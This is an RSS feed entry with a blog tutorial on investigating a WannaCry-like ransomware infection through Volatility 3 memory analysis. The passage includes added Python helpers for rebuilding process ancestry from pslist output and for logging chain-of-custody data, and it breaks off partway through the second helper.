  508. <description><![CDATA[<p>Analyzing a memory dump after a ransomware attack with Volatility to find processes, parent–child chains, injected code, and other valuable artifacts</p>
  509. <p>The post <a href="https://hackers-arise.com/digital-forensics-investigating-a-ransomware-attack/">Digital Forensics: Investigating a Ransomware Attack</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
  510. <content:encoded><![CDATA[<p>Welcome back, aspiring forensic investigators! </p>
  511.  
  512.  
  513.  
  514. <p>We continue our practical series on digital forensics and will look at the memory dump of a Windows machine after a ransomware attack. Ransomware incidents are common, although they may not always be the most profitable attacks because they require a lot of effort and stealth. Some operations take months of hard work and sleepless nights and still never pay off. Many attackers prefer to steal data and sell it on the dark web. Such data sells well and quickly. State-sponsored APTs act similarly. Their goal is to stay silent and extract as much intelligence as possible.</p>
  515.  
  516.  
  517.  
  518. <p>Today, a thousand unique records of private information of Russian citizens cost about $100. That’s cheap, but it also shows how effective Ukrainian and foreign hackers are against Russia. All this raises demand for digital forensics and incident response, since fines for data leaks can be enormous. Fines are not the only threat; reputation damage is critical. If you suffer a public data breach while your competitor has not (at least not yet), trust in your company will start crumbling and customers will be inclined to move to your competitors’ services. An even worse scenario is a ransomware attack that locks down much of your organization and wipes out your backups. Paying the attackers gives no guarantee of recovering your data, and some companies never manage to recover at all.</p>
  519.  
  520.  
  521.  
  522. <p>So let’s investigate one of those attacks and learn something new to stay sharp.</p>
  523.  
  524.  
  525.  
  526. <h2 class="wp-block-heading"><strong>Memory Analysis</strong></h2>
  527.  
  528.  
  529.  
  530. <p>It all begins with a memory dump. Here we already have a memory dump file of an infected machine that we are going to inspect.</p>
  531.  
  532.  
  533.  
  534. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="796" height="151" src="https://hackers-arise.com/wp-content/uploads/2025/10/1-memory-dump.webp" alt="showing the memory dump after a ransomware attack" class="wp-image-18594" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/1-memory-dump.webp 796w, https://hackers-arise.com/wp-content/uploads/2025/10/1-memory-dump-300x57.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/1-memory-dump-768x146.webp 768w" sizes="(max-width: 796px) 100vw, 796px" /></figure>
  535.  
  536.  
  537.  
  538. <h3 class="wp-block-heading"><strong>Installing Volatility</strong></h3>
  539.  
  540.  
  541.  
  542. <p>On our Kali machine we created a new Python virtual environment for Volatility. Keeping separate environments is good practice because it prevents tools from interfering with other dependencies. Sometimes installing one tool can break another. Here is how you do it:</p>
  543.  
  544.  
  545.  
  546. <p><code>bash$ &gt; python3 -m venv env_name</code></p>
  547.  
  548.  
  549.  
  550. <p><code>bash$ &gt; source env_name/bin/activate</code></p>
  551.  
  552.  
  553.  
  554. <p>Now we are ready to install Volatility in this environment:</p>
  555.  
  556.  
  557.  
  558. <p><code>bash$ &gt; pip3 install volatility3</code></p>
  559.  
  560.  
  561.  
  562. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="986" height="238" src="https://hackers-arise.com/wp-content/uploads/2025/10/2-installing-volatility.webp" alt="installing Volatility 3" class="wp-image-18595" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/2-installing-volatility.webp 986w, https://hackers-arise.com/wp-content/uploads/2025/10/2-installing-volatility-300x72.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/2-installing-volatility-768x185.webp 768w" sizes="(max-width: 986px) 100vw, 986px" /></figure>
  563.  
  564.  
  565.  
  566. <p>It is also good practice to record the exact versions of Volatility and Python you used (for example, <code>pip3 show volatility3</code> and <code>python3 --version</code>). Memory forensics tools change over time and some plugins behave slightly differently between releases. Recording versions makes your work reproducible later.</p>
  567.  
  568.  
  569.  
  570. <h3 class="wp-block-heading"><strong>Image Information</strong></h3>
  571.  
  572.  
  573.  
  574. <p>One of the first things we look at after receiving a memory dump is the captured metadata. The Volatility 3 command is simple:</p>
  575.  
  576.  
  577.  
  578. <p><code>bash$ vol -f infected.vmem windows.info</code></p>
  579.  
  580.  
  581.  
  582. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="409" src="https://hackers-arise.com/wp-content/uploads/2025/10/3-getting-the-image-info-and-metadate-of-the-capture-1024x409.webp" alt="getting the image info and metadata with Volatility 3" class="wp-image-18597" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/3-getting-the-image-info-and-metadate-of-the-capture-1024x409.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/3-getting-the-image-info-and-metadate-of-the-capture-300x120.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/3-getting-the-image-info-and-metadate-of-the-capture-768x307.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/3-getting-the-image-info-and-metadate-of-the-capture-1536x613.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/3-getting-the-image-info-and-metadate-of-the-capture.webp 1625w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  583.  
  584.  
  585.  
  586. <p>When you run <code>windows.info</code>, inspect the OS build, memory size, and timestamps shown by the capture tool. That OS build value helps Volatility pick the correct symbol tables. Incorrect symbols can cause missing or malformed output. This is especially important if you are working with Volatility 2. Also confirm the capture method and metadata such as who made the capture, when, and whether the capture was acquired after isolating the machine. Recording this chain-of-custody metadata is a small step that greatly strengthens any forensic report.</p>
  587.  
  588.  
  589.  
  590. <h3 class="wp-block-heading"><strong>Processes</strong></h3>
  591.  
  592.  
  593.  
  594. <p>The goal of the memory dump is to preserve processes, injections, and shellcode before they disappear after a reboot. That means we need to focus on the processes that existed at capture time. Let’s list them all:</p>
  595.  
  596.  
  597.  
  598. <p><code>bash$ &gt; vol -f infected.vmem windows.pslist</code></p>
  599.  
  600.  
  601.  
  602. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="408" src="https://hackers-arise.com/wp-content/uploads/2025/10/4-listing-active-processes-with-volatility-1024x408.webp" alt="listing the processes on the image with volatility 3" class="wp-image-18598" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/4-listing-active-processes-with-volatility-1024x408.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/4-listing-active-processes-with-volatility-300x120.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/4-listing-active-processes-with-volatility-768x306.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/4-listing-active-processes-with-volatility-1536x612.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/4-listing-active-processes-with-volatility.webp 1584w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  603.  
  604.  
  605.  
  606. <p>Suspicious processes are not always easy to spot. It depends on the attacker’s tactics. Ransomware processes, unlike persistence mechanisms, are often obvious because attackers tend to pick violent or alarming names for encryptors. But that’s not always the case, so let’s give our image a closer look.</p>
  607.  
  608.  
  609.  
  610. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="251" src="https://hackers-arise.com/wp-content/uploads/2025/10/5-finding-a-ransomware-process-1024x251.webp" alt="finding the ransomware process" class="wp-image-18599" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/5-finding-a-ransomware-process-1024x251.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/5-finding-a-ransomware-process-300x73.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/5-finding-a-ransomware-process-768x188.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/5-finding-a-ransomware-process.webp 1339w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  611.  
  612.  
  613.  
  614. <p>Among other processes, a ransomware process sticks out. You may also notice or4qtckT.exe and other processes with unknown names. Random executable names are not definitive proof of maliciousness, but they’re a reliable starting point for closer inspection. Some legitimate software may also generate processes with random names, for example, Dr.Web, a Russian antivirus.</p>
  615.  
  616.  
  617.  
  618. <p>When a process name looks random, check several things: the process parent, the process start time (did it start right before the incident?), open network sockets, loaded DLLs, and whether the executable exists on disk or only in memory. Processes that only exist in the RAM image (no matching file on disk) often indicate in-memory unpacking or fileless behavior. These are important signals in malware analysis. Use plugins like <code>windows.psscan</code> (process scan) to find processes that <code>pslist</code> might miss and <code>windows.pstree</code> to visualize parent/child relationships. Also check <code>windows.dlllist</code> to see suspicious DLLs loaded into a process. Injected code often pulls suspicious DLL names or shows unnatural memory protections on executable pages.</p>
  619.  
  620.  
  621.  
  622. <h3 class="wp-block-heading"><strong>Parent Relationships</strong></h3>
  623.  
  624.  
  625.  
  626. <p>Once you find malware, your next step is to find its parent. A parent is the process that launches another process. This is how you unravel the attack by going back in the timeline. <code>windows.pslist</code> has two important columns: PID (process ID) and PPID (parent process ID). The parent of WanaDecryptor has PID 2732. We can quickly search and find it.</p>
  627.  
  628.  
  629.  
  630. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="210" src="https://hackers-arise.com/wp-content/uploads/2025/10/6-found-the-parent-1024x210.webp" alt="finding the parent of the ransomware process with volatility 3" class="wp-image-18600" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/6-found-the-parent-1024x210.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/6-found-the-parent-300x61.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/6-found-the-parent-768x157.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/6-found-the-parent.webp 1324w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  631.  
  632.  
  633.  
  634. <p>Now we know that the process with a random name or4qtckT.exe initiated WanaDecryptor. As it might not be the only process initiated by that parent, let’s grep its PID and find out:</p>
  635.  
  636.  
  637.  
  638. <p><code>bash$ &gt; vol -f infected.vmem windows.psscan | grep 2732</code></p>
  639.  
  640.  
  641.  
  642. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="150" src="https://hackers-arise.com/wp-content/uploads/2025/10/7-found-other-processes-initiated-by-the-parent-1024x150.webp" alt="finding other processes initiated by the parent" class="wp-image-18602" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/7-found-other-processes-initiated-by-the-parent-1024x150.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/7-found-other-processes-initiated-by-the-parent-300x44.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/7-found-other-processes-initiated-by-the-parent-768x112.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/7-found-other-processes-initiated-by-the-parent-1536x225.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/7-found-other-processes-initiated-by-the-parent.webp 1612w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  643.  
  644.  
  645.  
  646. <p>The parent process can show how the attacker entered the machine. It might be a user process opened by a phishing email, a scheduled task that ran at an odd hour, or a system service that got abused. Tracing parents helps you decide whether this was an interactive compromise (an attacker manually ran something) or an automated spread. If you see network-facing services as parents or child processes that match known service names (for example, svchost.exe variants), dig deeper. Some ransomware uses service abuse, scheduled tasks, or built-in Windows mechanisms to reach higher privileges or persistence.</p>
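<p>The parent lookup above can be done by column instead of by eye or with grep. The following is an added example, not code from this post or from the Volatility project: it parses the text table that <code>windows.pslist</code> prints (here a constructed sample in that layout, in which only PID 2732 for or4qtckT.exe and the WanaDecryptor name come from the walkthrough) and rebuilds the ancestry chain, the siblings spawned by the same parent, and the processes whose parent is no longer in the list.</p>

```python
"""Rebuild parent/child chains from Volatility 3 windows.pslist text output.

Added example for this walkthrough (not code from the post or from the
Volatility project): parses the tab-separated table that
`vol -f infected.vmem windows.pslist` prints and answers by column lookup
what the post does by eye and with grep.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample laid out like the pslist text renderer's output.
# PID 2732 for or4qtckT.exe and the WanaDecryptor name come from the post;
# every other PID, offset, count and timestamp is made up. The svchost.exe
# row carries "2732" inside its Offset(V) on purpose (a grep false positive).
SAMPLE_PSLIST = """\
Volatility 3 Framework 2.7.0
Progress:  100.00\t\tPDB scanning finished
PID\tPPID\tImageFileName\tOffset(V)\tThreads\tHandles\tSessionId\tWow64\tCreateTime\tExitTime\tFile output

4\t0\tSystem\t0x84f2a020\t53\t469\tN/A\tFalse\t2025-10-01 09:00:00.000000 \tN/A\tDisabled
344\t4\tsmss.exe\t0x85112730\t2\t29\tN/A\tFalse\t2025-10-01 09:00:02.000000 \tN/A\tDisabled
444\t412\twininit.exe\t0x851f0a18\t3\t78\t0\tFalse\t2025-10-01 09:00:05.000000 \tN/A\tDisabled
520\t444\tservices.exe\t0x85201d40\t9\t221\t0\tFalse\t2025-10-01 09:00:06.000000 \tN/A\tDisabled
612\t520\tsvchost.exe\t0x8527328c\t11\t340\t0\tFalse\t2025-10-01 09:00:20.000000 \tN/A\tDisabled
1312\t1024\texplorer.exe\t0x8563a2a0\t24\t610\t1\tFalse\t2025-10-01 09:01:10.000000 \tN/A\tDisabled
2732\t1312\tor4qtckT.exe\t0x8554c6e8\t7\t81\t1\tFalse\t2025-10-01 09:12:27.000000 \tN/A\tDisabled
2908\t2732\tWanaDecryptor.exe\t0x8551a030\t2\t71\t1\tFalse\t2025-10-01 09:12:31.000000 \tN/A\tDisabled
1160\t2732\tcmd.exe\t0x85480d40\t1\t22\t1\tFalse\t2025-10-01 09:12:45.000000 \t2025-10-01 09:12:46.000000 \tDisabled
"""

@dataclass
class Process:
    pid: int
    ppid: int
    name: str
    offset: str
    create_time: str
    exit_time: Optional[str]  # None if still alive at capture time

def parse_pslist(text: str) -> Dict[int, Process]:
    """Parse the table into {pid: Process}; banner lines before the header are skipped."""
    procs: Dict[int, Process] = {}
    in_table = False
    for line in text.splitlines():
        if not in_table:
            in_table = line.startswith("PID\tPPID\t")
            continue
        if not line.strip():
            continue
        cols = line.split("\t")
        if len(cols) < 10:
            raise ValueError(f"unexpected pslist row: {line!r}")
        exit_time = cols[9].strip()
        procs[int(cols[0])] = Process(
            pid=int(cols[0]), ppid=int(cols[1]), name=cols[2], offset=cols[3],
            create_time=cols[8].strip(),
            exit_time=None if exit_time == "N/A" else exit_time,
        )
    return procs

def children_of(procs: Dict[int, Process], ppid: int) -> List[Process]:
    """Processes whose PPID column equals ppid, in table order.

    Matching the column rather than the whole line is what separates this
    from `windows.psscan | grep 2732`, which also hits rows where the digits
    occur inside an offset, a handle count or a timestamp.
    """
    return [p for p in procs.values() if p.ppid == ppid]

def ancestry(procs: Dict[int, Process], pid: int) -> List[Process]:
    """Walk PID -> PPID upward until PPID 0 or a parent missing from the table.

    A missing parent is normal for wininit.exe (its smss.exe instance exits)
    and explorer.exe (userinit.exe exits); for anything else, re-run the walk
    over windows.psscan output, which can recover exited or unlinked processes.
    """
    chain: List[Process] = []
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)  # guard against corrupted PPID loops in a damaged image
        chain.append(procs[pid])
        pid = procs[pid].ppid
    return chain

def orphans(procs: Dict[int, Process]) -> List[Process]:
    """Processes whose parent is absent from the table (PPID 0 is the root)."""
    return [p for p in procs.values() if p.ppid != 0 and p.ppid not in procs]

def main() -> None:
    procs = parse_pslist(SAMPLE_PSLIST)
    for hit in (p for p in procs.values() if "wanadecrypt" in p.name.lower()):
        chain = " <- ".join(f"{p.name} ({p.pid})" for p in ancestry(procs, hit.pid))
        print(f"ancestry of {hit.name}: {chain}")
        for sib in children_of(procs, hit.ppid):
            state = f"exited {sib.exit_time}" if sib.exit_time else "alive at capture"
            print(f"  PPID {hit.ppid} -> {sib.name} ({sib.pid}), {state}")
    for p in orphans(procs):
        print(f"parent {p.ppid} of {p.name} ({p.pid}) not in pslist; check psscan")

if __name__ == "__main__":
    main()
```

Feed it the real output with <code>vol -f infected.vmem windows.pslist > pslist.txt</code> and read that file instead of the sample; the same parser works on <code>windows.psscan</code> output, whose columns are identical.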
  647.  
  648.  
  649.  
  650. <h3 class="wp-block-heading"><strong>Handles</strong></h3>
  651.  
  652.  
  653.  
  654. <p>In Windows forensics, when we say we are &#8220;viewing the handles of a process,&#8221; we mean examining the internal references that a process has opened to system resources. A handle in Windows is essentially a unique identifier (a number) that a process uses to access an operating system object. Processes do not work directly with raw resources like files, registry keys, threads, or network connections. Instead, when a process needs access to something, it asks Windows to open that object, and Windows returns a handle. That handle acts like a ticket which the process can use to interact with the object safely.</p>
  655.  
  656.  
  657.  
  658. <p><code>bash$ &gt; vol -f infected.vmem windows.handles --pid 2732</code></p>
  659.  
  660.  
  661.  
  662. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="398" src="https://hackers-arise.com/wp-content/uploads/2025/10/8-found-handles-used-by-the-malware-1024x398.webp" alt="listing handles used by the malware in volatility 3" class="wp-image-18601" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/8-found-handles-used-by-the-malware-1024x398.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/8-found-handles-used-by-the-malware-300x117.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/8-found-handles-used-by-the-malware-768x299.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/8-found-handles-used-by-the-malware-1536x597.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/8-found-handles-used-by-the-malware.webp 1618w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  663.  
  664.  
  665.  
  666. <p>First, we see a user (hacker) directory. That should be noted for further analysis, because user directories contain useful evidence in <code>NTUSER.DAT</code> and <code>USRCLASS.DAT</code>. These objects can be accessed after a full disk capture and will include thorough information about shares, directories, and objects the user accessed.</p>
  667.  
  668.  
  669.  
  670. <p>Inspecting the handles, we found an .eky file that was used to encrypt the system.</p>
  671.  
  672.  
  673.  
  674. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="292" src="https://hackers-arise.com/wp-content/uploads/2025/10/9-found-eky-file-used-to-encrypt-the-system-1024x292.webp" alt="finding .eky file used to encrypt the system" class="wp-image-18603" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/9-found-eky-file-used-to-encrypt-the-system-1024x292.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/9-found-eky-file-used-to-encrypt-the-system-300x85.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/9-found-eky-file-used-to-encrypt-the-system-768x219.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/9-found-eky-file-used-to-encrypt-the-system.webp 1478w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  675.  
  676.  
  677.  
  678. <p>This .eky file contains the secret the attacker needed to lock files on the system. These keys are brought from the outside and are not native system objects. Obtaining this key does not guarantee successful decryption. It depends on what kind of key file it is and how it was protected.</p>
  679.  
  680.  
  681.  
  682. <p>When you find cryptographic artifacts in handles, copy the file bytes, if possible, and get the hashes (SHA-256) before touching them. Export them into an isolated analysis workstation. Then compare the artifact to public resources and sandbox reports. Not every key-like file is the private key you need to decrypt. Sometimes attackers include only a portion or an encrypted container that requires an additional password or remote secret. Public repositories and collective projects (for example, NoMoreRansom and vendor decryptors) may already have decryption tools for some ransomware families, so check there before calling data irrecoverable.</p>
  683.  
  684.  
  685.  
  686. <h3 class="wp-block-heading"><strong>Command Line</strong></h3>
  687.  
  688.  
  689.  
  690. <p>Now let’s inspect the command lines of the processes. Listing all command lines gives you more visibility to spot malicious behavior:</p>
  691.  
  692.  
  693.  
  694. <p><code>bash$ &gt; vol -f infected.vmem windows.cmdline</code></p>
  695.  
  696.  
  697.  
  698. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="312" src="https://hackers-arise.com/wp-content/uploads/2025/10/10-listed-the-command-line-of-the-processes-1024x312.webp" alt="listing the command line of the processes with volatility 3" class="wp-image-18604" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/10-listed-the-command-line-of-the-processes-1024x312.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/10-listed-the-command-line-of-the-processes-300x91.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/10-listed-the-command-line-of-the-processes-768x234.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/10-listed-the-command-line-of-the-processes-1536x467.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/10-listed-the-command-line-of-the-processes.webp 1620w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  699.  
  700.  
  701.  
  702. <p>You can also narrow it down to the needed PIDs or file names:</p>
  703.  
  704.  
  705.  
  706. <p><code>bash$ &gt; vol -f infected.vmem windows.cmdline | grep or4</code></p>
  707.  
  708.  
  709.  
  710. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="232" src="https://hackers-arise.com/wp-content/uploads/2025/10/11-listed-the-command-line-of-the-parent-1024x232.webp" alt="listing command line of te malware" class="wp-image-18605" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/11-listed-the-command-line-of-the-parent-1024x232.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/11-listed-the-command-line-of-the-parent-300x68.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/11-listed-the-command-line-of-the-parent-768x174.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/11-listed-the-command-line-of-the-parent.webp 1483w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  711.  
  712.  
  713.  
  714. <p>We can now see where the attack originated. After a successful compromise of a system or a domain, the attacker brought their malware to the system and encrypted it with their own keys.</p>
  715.  
  716.  
  717.  
  718. <p>The command line often contains the exact flags or network locations the attacker used (for example, -server 192.168.x.x or a path to an unpacker). Attackers sometimes use command-line switches to hide behavior, choose a configuration file, or provide a URL to download further payloads. If you can capture the command line, you often capture the attacker’s intent in plain text, which is invaluable evidence. Also check process environment variables, if those are available, because they might contain temporary filenames, credentials, or proxy settings the malware used.</p>
  719.  
  720.  
  721.  
  722. <h3 class="wp-block-heading"><strong>Getting Hashes</strong></h3>
  723.  
  724.  
  725.  
  726. <p>Obviously the investigation does not stop here. You need to extract the file from memory, calculate its hash, and inspect how the malware behaves on AnyRun, VirusTotal, and other platforms. To extract the malware we first need to find its address in memory:</p>
  727.  
  728.  
  729.  
  730. <p><code>bash$ &gt; vol -f infected.vmem windows.filescan | grep -i or4qtckT</code></p>
  731.  
  732.  
  733.  
  734. <p>Let’s pick the second hit and extract it now:</p>
  735.  
  736.  
  737.  
  738. <p><code>bash$ &gt; vol -f infected.vmem windows.dumpfiles --physaddr 0x1fcaf798</code></p>
  739.  
  740.  
  741.  
  742. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="291" src="https://hackers-arise.com/wp-content/uploads/2025/10/12-exported-the-malware-1024x291.webp" alt="extracting the malware from the memory for later analysis" class="wp-image-18606" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/12-exported-the-malware-1024x291.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/12-exported-the-malware-300x85.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/12-exported-the-malware-768x218.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/12-exported-the-malware.webp 1537w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  743.  
  744.  
  745.  
  746. <p>The ImageSection dump (.img) usually looks like the program that was running in memory. It can include changes made while the program was loaded, such as unpacked code or adjusted memory addresses. The DataSection dump (.dat), on the other hand, shows what the file looks like on disk, or at least part of it. That’s why there are two dumps with the same name: Volatility detected both the in-memory version and the on-disk version of or4qtckT.exe.</p>
  747.  
  748.  
  749.  
  750. <p>Next we generate the hash of the DataSectionObject and look it up on VirusTotal:</p>
  751.  
  752.  
  753.  
  754. <p><code>bash$ &gt; sha256sum file.0x1fcaf798.0x85553db8.DataSectionObject.or4qtckT.exe.dat</code></p>
  755.  
  756.  
  757.  
  758. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="128" src="https://hackers-arise.com/wp-content/uploads/2025/10/13-got-the-hash-of-the-malware-1024x128.webp" alt="getting the file hash" class="wp-image-18607" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/13-got-the-hash-of-the-malware-1024x128.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/13-got-the-hash-of-the-malware-300x37.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/13-got-the-hash-of-the-malware-768x96.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/13-got-the-hash-of-the-malware.webp 1537w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  759.  
  760.  
  761.  
  762. <p>We recommend using robust hashing (SHA-256 instead of MD5) to avoid collision issues.</p>
  763.  
  764.  
  765.  
  766. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="381" src="https://hackers-arise.com/wp-content/uploads/2025/10/14-obtained-virus-total-report-1024x381.webp" alt="running the hash in VirusTotal" class="wp-image-18608" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/14-obtained-virus-total-report-1024x381.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/14-obtained-virus-total-report-300x112.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/14-obtained-virus-total-report-768x286.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/14-obtained-virus-total-report-1536x572.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/14-obtained-virus-total-report.webp 1725w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  767.  
  768.  
  769.  
  770. <p>For more information, go to Hybrid Analysis to get a detailed report on the malware’s capabilities.</p>
  771.  
  772.  
  773.  
  774. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="374" src="https://hackers-arise.com/wp-content/uploads/2025/10/15-got-the-hybrid-analysis-report-1024x374.webp" alt="Hybrid Analysis report of the WannaDecryptor" class="wp-image-18609" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/15-got-the-hybrid-analysis-report-1024x374.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/15-got-the-hybrid-analysis-report-300x109.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/15-got-the-hybrid-analysis-report-768x280.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/15-got-the-hybrid-analysis-report-1536x560.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/15-got-the-hybrid-analysis-report.webp 1568w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  775.  
  776.  
  777.  
  778. <p>Platforms such as VirusTotal, AnyRun, Hybrid Analysis, and Joe Sandbox produce behavioral reports, network traffic captures, and dropped files that help you map capabilities like network C2, persistence techniques, and whether the sample attempts to self-propagate. In our case, this sample has been found in online sandbox reports and is flagged with ransomware/WannaCry-like behavior. Sandbox summaries showed malicious activity consistent with file encryption and automated spread. When reading sandbox output, focus on three things: dropped files, outbound connections, and any use of legacy Windows features (SMB, WMI, PsExec) to move laterally.</p>
  779.  
  780.  
  781.  
  782. <h3 class="wp-block-heading"><strong>Practical next steps for the investigator</strong></h3>
  783.  
  784.  
  785.  
  786. <p>First, preserve the memory image and any extracted files exactly as you found them. Do not run suspicious samples on your analysis workstation unless it is fully isolated. Second, gather network indicators (IP addresses, domain names) and add them to your blocklists and detection rules. Third, check for related persistence mechanisms on disk and in registry hives, if you have the disk image. Scheduled tasks, <code>HKLM\Software\Microsoft\Windows\CurrentVersion\Run</code> entries, service modifications, and driver loads are common. Fourth, feed the sample hash and any dropped files into public repositories and vendor sandboxes. These can help you find other victims and understand the campaign’s breadth. Finally, document everything, every command and every timestamp, so you can later show how the evidence was acquired, processed, and analyzed. For memory-specific checks, run Volatility plugins such as <code>malfind</code> (detect injection), <code>ldrmodules</code> (module loads), <code>dlllist</code>, <code>netscan</code> (network sockets), and registry plugins to inspect in-memory registry hives.</p>
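<p>The last two points, recording tool versions and every command with its timestamp while proving the image was never modified, can be enforced by a small wrapper. The following is an added example, not code from this post or from the Volatility project; the image name, log name and the plugin list are assumptions that mirror the commands used above.</p>

```python
"""Run a Volatility plugin under a chain-of-custody log.

Added example for this post, not code from Hackers Arise or from the
Volatility project. Every run records the image hash before and after
(proving the evidence file was not modified), the exact argv, UTC start
and end times, tool versions, the exit code and a hash of the saved output,
as one JSON line that can later be replayed into the report.
"""
import hashlib
import json
import platform
import subprocess
from datetime import datetime, timezone
from pathlib import Path
from typing import Dict, List, Union

PathLike = Union[str, Path]

def sha256_file(path: PathLike, chunk: int = 1 << 20) -> str:
    """Stream a large file (memory images run to gigabytes) through SHA-256."""
    digest = hashlib.sha256()
    with Path(path).open("rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()

def tool_versions() -> Dict[str, str]:
    """Record the Python and volatility3 versions; 'not installed' if absent."""
    from importlib.metadata import PackageNotFoundError, version
    try:
        vol = version("volatility3")
    except PackageNotFoundError:
        vol = "not installed"
    return {"python": platform.python_version(), "volatility3": vol}

def vol_cmd(image: PathLike, plugin: str, *args: str) -> List[str]:
    """Build the same command line the post uses, e.g. vol -f infected.vmem windows.pslist."""
    return ["vol", "-f", str(image), plugin, *args]

def run_logged(argv: List[str], image: PathLike, log: PathLike, note: str = "") -> Dict[str, object]:
    """Run argv, save its stdout beside the log, append a custody record, return it."""
    image, log = Path(image), Path(log)
    before = sha256_file(image)
    started = datetime.now(timezone.utc)
    proc = subprocess.run(argv, capture_output=True, text=True)
    finished = datetime.now(timezone.utc)
    after = sha256_file(image)
    out_file = log.with_name(started.strftime("%Y%m%dT%H%M%S.%fZ") + ".stdout.txt")
    out_file.write_text(proc.stdout, encoding="utf-8")
    record = {
        "note": note,
        "argv": argv,
        "image": str(image),
        "image_sha256_before": before,
        "image_sha256_after": after,
        "image_unchanged": before == after,
        "started_utc": started.isoformat(),
        "finished_utc": finished.isoformat(),
        "returncode": proc.returncode,
        "stdout_file": str(out_file),
        "stdout_sha256": hashlib.sha256(proc.stdout.encode("utf-8")).hexdigest(),
        "stderr_tail": proc.stderr[-500:],
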